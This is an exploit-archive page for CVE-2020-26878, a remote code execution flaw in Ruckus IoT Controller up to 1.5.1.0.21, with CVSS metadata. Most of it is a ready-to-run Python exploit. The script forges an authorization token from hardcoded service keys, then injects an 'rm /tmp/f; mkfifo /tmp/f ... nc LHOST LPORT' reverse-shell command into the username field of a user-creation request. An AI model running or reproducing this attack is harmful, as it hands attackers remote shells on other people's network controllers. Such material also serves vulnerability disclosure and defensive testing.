Ruckus IoT Controller 1.5.1.0.21 Remote Code Execution

2020.11.29
Credit: Emre Suren
Risk: High
Local: No
Remote: Yes
CWE: CWE-862


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Product: Ruckus IoT Controller (Ruckus vRIoT) # Version: <= 1.5.1.0.21 # Vendor: https://support.ruckuswireless.com/ # Vulnerability: Command Injection & Broken Authentication # References: CVE-2020-26878 # Discovered by: Juan Manuel Fernandez # Exploit Title: Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution # Exploit Author: Emre SUREN # Disclosure Date: 2020-10-26 # Tested on: Appliance #!/usr/bin/python # -*- coding: utf-8 -*- import requests, urllib3, sys from Crypto.Cipher import AES from base64 import b64encode, b64decode from colorama import Fore urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def listen(lhost, lport): opt = str(raw_input(Fore.YELLOW + "[?] Listening " + lhost + " " + lport + " (i.e. netcat) ? (y/n): ")) if opt == "y": return True else: return False def generatePayload(lhost, lport): payload="; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc "+lhost+" "+lport+" >/tmp/f; #" return payload def generateMagicToken(): enc_dec_method = 'utf-8' salt = 'nplusServiceAuth' salt = salt.encode("utf8") str_key = 'serviceN1authent' str_to_enc = 'TlBMVVMx' return encrypt(enc_dec_method, salt, str_key, str_to_enc) def encrypt(enc_dec_method, salt, str_key, str_to_enc): aes_obj = AES.new(str_key, AES.MODE_CFB, salt) hx_enc = aes_obj.encrypt(str_to_enc.encode("utf8")) mret = b64encode(hx_enc).decode(enc_dec_method) return mret def execCmd(rhost, rport, lhost, lport): payload = generatePayload(lhost, lport) post_data = { "username": payload, "password": "test" } print(Fore.BLUE + "[*] Payload\t: " + payload) token = generateMagicToken() headers = { "Authorization": token } rpath = "/service/v1/createUser" uri = 'https://' + rhost + ":" + rport + rpath r = requests.post(uri, json=post_data, headers=headers, verify=False) print(Fore.BLUE + "[*] Request sent") if r.status_code == 200: print(Fore.GREEN + "[+] Successful. Check for the session...") else: print(Fore.RED + "[X] Failed. Check for the response...") print(Fore.BLUE + "[*] Response\t: " + r.text) sys.exit() def main(): if (len(sys.argv) != 5): print("[*] Usage: ruckus151021.py <RHOST> <RPORT> <LHOST> <LPORT>") print("[*] <RHOST> -> Target IP") print("[*] <RPORT> -> Target Port") print("[*] <LHOST> -> Attacker IP") print("[*] <LPORT> -> Attacker Port") print("[*] Example: python {} 192.168.2.25 443 192.168.2.3 9001".format(sys.argv[0])) exit(0) rhost = sys.argv[1] rport = sys.argv[2] lhost = sys.argv[3] lport = sys.argv[4] if not listen(lhost, lport): print(Fore.RED + "[!] Please listen at port {} to connect a reverse session !".format(lport)) else: execCmd(rhost, rport, lhost, lport) if __name__ == "__main__": main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top